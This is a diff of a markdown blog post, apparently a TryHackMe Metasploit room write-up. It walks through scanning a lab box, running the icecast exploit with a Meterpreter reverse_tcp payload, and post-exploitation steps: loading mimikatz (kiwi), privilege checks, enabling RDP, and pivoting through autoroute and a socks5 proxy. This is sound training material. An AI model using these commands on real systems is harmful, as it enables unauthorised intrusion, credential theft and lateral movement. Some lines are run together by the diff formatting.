fatalmusic/fatalmusic.github.io/_posts/2022-04-04-rpmetasploit.md

 *Note, this diagram includes both the interfaces and *most\* of the modules.
 This diagram does not include the 'Post' module.

-1. Easily the most common module utilized, which module holds all of the exploit code we will use?
+Easily the most common module utilized, which module holds all of the exploit code we will use?

 - `exploit`

-2. Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation?
+Used hand in hand with exploits, which module contains the various bits of shellcode we send to have executed following exploitation?

 - `payload`

-3. Which module is most commonly used in scanning and verification machines are exploitable?
+Which module is most commonly used in scanning and verification machines are exploitable?
 This is not the same as the actual exploitation of course.

 - `auxiliary`

-4. One of the most common activities after exploitation is looting and pivoting.
+One of the most common activities after exploitation is looting and pivoting.
 Which module provides these capabilities?

 - `post`

-5. Commonly utilized in payload obfuscation, which module allows us to modify the 'appearance' of our exploit such that we may avoid signature detection?
+Commonly utilized in payload obfuscation, which module allows us to modify the 'appearance' of our exploit such that we may avoid signature detection?

 - `encoder`

-6. Last but not least, which module is used with buffer overflow and ROP attacks?
+Last but not least, which module is used with buffer overflow and ROP attacks?

 - `nop`

-7. Not every module is loaded in by default, what command can we use to load different modules?
+Not every module is loaded in by default, what command can we use to load different modules?

 - `load`

 ## Task 5 Move That Shell!

 Remember that database we set up?
 In this step, we're going to take a look at what we can use it for and exploit our victim while we're at it!
 As you might have noticed, up until this point we haven't touched nmap in this room, let alone perform much recon on our victim box.

 That'll all change now as we'll take a swing at using nmap within Metasploit.
 Go ahead and deploy the box now, it may have up to a three-minute delay for starting up our target vulnerable service.

 Note, Metasploit does support different types of port scans from within the auxiliary modules.
 Metasploit can also import other scans from nmap and Nessus just to name a few.

 Metasploit comes with a built-in way to run nmap and feed it's results directly into our database.
+Let's run that now by using the command

+- `db_nmap -sV 10.10.199.128`

+What service does nmap identify running on port 135?

+- `msrpc`

-Let's run that now by using the command db_nmap -sV 10.10.199.128 db_nmap -sV 10.10.199.128What service does nmap identify running on port 135? msrpc msrpcLet's go ahead and see what information we have collected in the database.
-Try typing the command hosts into the msfconsole now. hostsHow about something else from the database, try the command services now. servicesOne last thing, try the command vulns now.
+Let's go ahead and see what information we have collected in the database.

+Try typing the command hosts into the msfconsole now.

+- `hosts`

+How about something else from the database, try the command services now.

+- `services`

+One last thing, try the command vulns now.
 This won't show much at the current moment, however, it's worth noting that Metasploit will keep track of discovered vulnerabilities.
+One of the many ways the database can be leveraged quickly and powerfully.

+- `vulns`

-One of the many ways the database can be leveraged quickly and powerfully. vulnsNow that we've scanned our victim system, let's try connecting to it with a Metasploit payload.
+Now that we've scanned our victim system, let's try connecting to it with a Metasploit payload.
 First, we'll have to search for the target payload.

 In Metasploit 5 (the most recent version at the time of writing) you can simply type use followed by a unique string found within only the target exploit.
 For example, try this out now with the following command use icecast.
+What is the full path for our exploit that now appears on the msfconsole prompt? \*This will include the exploit section at the start

+- `exploit/windows/http/icecast_header`

+While that use command with the unique string can be incredibly useful that's not quite the exploit we want here.
+Let's now run the command search multi/handler.

+- `multi/handler`

-What is the full path for our exploit that now appears on the msfconsole prompt? \*This will include the exploit section at the start exploit/windows/http/icecast_header exploit/windows/http/icecast_headerWhile that use command with the unique string can be incredibly useful that's not quite the exploit we want here.
-Let's now run the command search multi/handler. multi/handlerGo ahead and run the command use NUMBER_NEXT_TO exploit/multi/handler wherein the number will be what appears in that far left column (typically this will be 4 or 5).
-In this way, we can use our search results without typing out the full name/path of the module we want to use. use 5
+Go ahead and run the command use NUMBER_NEXT_TO exploit/multi/handler wherein the number will be what appears in that far left column (typically this will be 4 or 5).
+In this way, we can use our search results without typing out the full name/path of the module we want to use.

+- `use 5`

 Now type the command use NUMBER_FROM_PREVIOUS_QUESTION.
 This is the short way to use modules returned by search results.

 Next, let's set the payload using this command set PAYLOAD windows/meterpreter/reverse_tcp.
 In this way, we can modify which payloads we want to use with our exploits.
 Additionally, let's run this command set LHOST YOUR_IP_ON_TRYHACKME.
+You might have to check your IP using the command ip addr, it will likely be your tun0 interface.

+- `show options`

-You might have to check your IP using the command ip addr, it will likely be your tun0 interface. use show options commandLet's go ahead and return to our previous exploit, run the command use icecast to select it again.
+use show options commandLet's go ahead and return to our previous exploit, run the command use icecast to select it again.

 One last step before we can run our exploit.
+Run the command set RHOSTS 10.10.199.128 to tell Metasploit which target to attack.

+- `set RHOST`

-Run the command set RHOSTS 10.10.199.128 to tell Metasploit which target to attack. always show options to see if all requirement are metOnce you're set those variables correctly, run the exploit now via either the command exploit or the command run -j to run this as a job. recommend use -j commandOnce we've started this, we can check all of the jobs running on the system by running the command jobs
+always show options to see if all requirement are metOnce you're set those variables correctly, run the exploit now via either the command exploit or the command run -j to run this as a job.

+- `exploit`

-After we've established our connection in the next task, we can list all of our sessions using the command sessions.
-Similarly, we can interact with a target session using the command sessions -i SESSION_NUMBER sessionssessions -i SESSION_NUMBER
+Once we've started this, we can check all of the jobs running on the system by running the command jobs After we've established our connection in the next task, we can list all of our sessions using the command sessions.
+Similarly, we can interact with a target session using the command sessions -i SESSION_NUMBER

+- `sessions`

 ## Task 6 Were In, Now What?

 Now that we've got a shell into our victim machine, let's take a look at several post-exploitation modules actions we can leverage!
 Most of the questions in the following section can be answered by using the Meterpreter help menu which can be accessed through the 'help' command.
 This menu dynamically expands as we load more modules.

 First things first, our initial shell/process typically isn't very stable.
 Let's go ahead and attempt to move to a different process.
 First, let's list the processes using the command ps.
+What's the name of the spool service?

+- `ps`

-What's the name of the spool service? psLet's go ahead and move into the spool process or at least attempt to!
+Let's go ahead and move into the spool process or at least attempt to!
 What command do we use to transfer ourselves into the process?
-This won't work at the current time as we don't have sufficient privileges but we can still try! migrate
+This won't work at the current time as we don't have sufficient privileges but we can still try!

+- `migrate`

 Well that migration didn't work, let's find out some more information about the system so we can try to elevate.
+What command can we run to find out more information regarding the current user running the process we are in?

+- `getuid`

+How about finding more information out about the system itself?

+- `sysinfo`

-What command can we run to find out more information regarding the current user running the process we are in? getuid getuidHow about finding more information out about the system itself? sysinfo sysinfoThis might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it? load kiwi
+This might take a little bit of googling, what do we run to load mimikatz (more specifically the new version of mimikatz) so we can use it?

+- `load kiwi`

-Let's go ahead and figure out the privileges of our current user, what command do we run? getprivs getprivsWhat command do we run to transfer files to our victim computer? upload
+Let's go ahead and figure out the privileges of our current user, what command do we run?

+- `getprivs`

+What command do we run to transfer files to our victim computer?

+- `upload`

-How about if we want to run a Metasploit module? run
+How about if we want to run a Metasploit module?

+- `run`

-A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim? ipconfig
+A simple question but still quite necessary, what command do we run to figure out the networking information and interfaces on our victim?

+- `ipconfig`

 Let's go ahead and run a few post modules from Metasploit.
 First, let's run the command run post/windows/gather/checkvm.
-This will determine if we're in a VM, a very useful piece of knowledge for further pivoting. post/windows/gather/checkvmNext, let's try: run post/multi/recon/local_exploit_suggester.
+This will determine if we're in a VM, a very useful piece of knowledge for further pivoting.

+- `post/windows/gather/checkvmNext`

+let's try: run post/multi/recon/local_exploit_suggester.
 This will check for various exploits which we can run within our session to elevate our privileges.
-Feel free to experiment using these suggestions, however, we'll be going through this in greater detail in the room Ice. run post/multi/recon/local_exploit_suggesterFinally, let's try forcing RDP to be available.
-This won't work since we aren't administrators, however, this is a fun command to know about: run post/windows/manage/enable_rdp run post/windows/manage/enable_rdpOne quick extra question, what command can we run in our meterpreter session to spawn a normal system shell? shell shell
+Feel free to experiment using these suggestions, however, we'll be going through this in greater detail in the room Ice.

+run post/multi/recon/local_exploit_suggesterFinally, let's try forcing RDP to be available.
+This won't work since we aren't administrators, however, this is a fun command to know about:

+- `run post/windows/manage/enable_rdp`

+One quick extra question, what command can we run in our meterpreter session to spawn a normal system shell?

+- `shell`

 ## Task 7 Making Cisco Proud

 Last but certainly not least, let's take a look at the autorouting options available to us in Metasploit.
 While our victim machine may not have multiple network interfaces (NICs), we'll walk through the motions of pivoting through our victim as if it did have access to extra networks.

 Let's go ahead and run the command run autoroute -h, this will pull up the help menu for autoroute.
 What command do we run to add a route to the following subnet: 172.18.1.0/24?
-Use the -n flag in your answer. run autoroute -s 172.18.1.0 -n 255.255.255.0 Additionally, we can start a socks5 proxy server out of this session.
+Use the -n flag in your answer.

+- `run autoroute -s 172.18.1.0 -n 255.255.255.0`

+Additionally, we can start a socks5 proxy server out of this session.
 Background our current meterpreter session and run the command search server/socks5.
-What is the full path to the socks5 auxiliary module? auxiliary/server/socks5
+What is the full path to the socks5 auxiliary module?

+- `auxiliary/server/socks5`

 Once we've started a socks server we can modify our /etc/proxychains.conf file to include our new server.
-What command do we prefix our commands (outside of Metasploit) to run them through our socks5 server with proxychains? proxychains
+What command do we prefix our commands (outside of Metasploit) to run them through our socks5 server with proxychains?

+- `proxychains`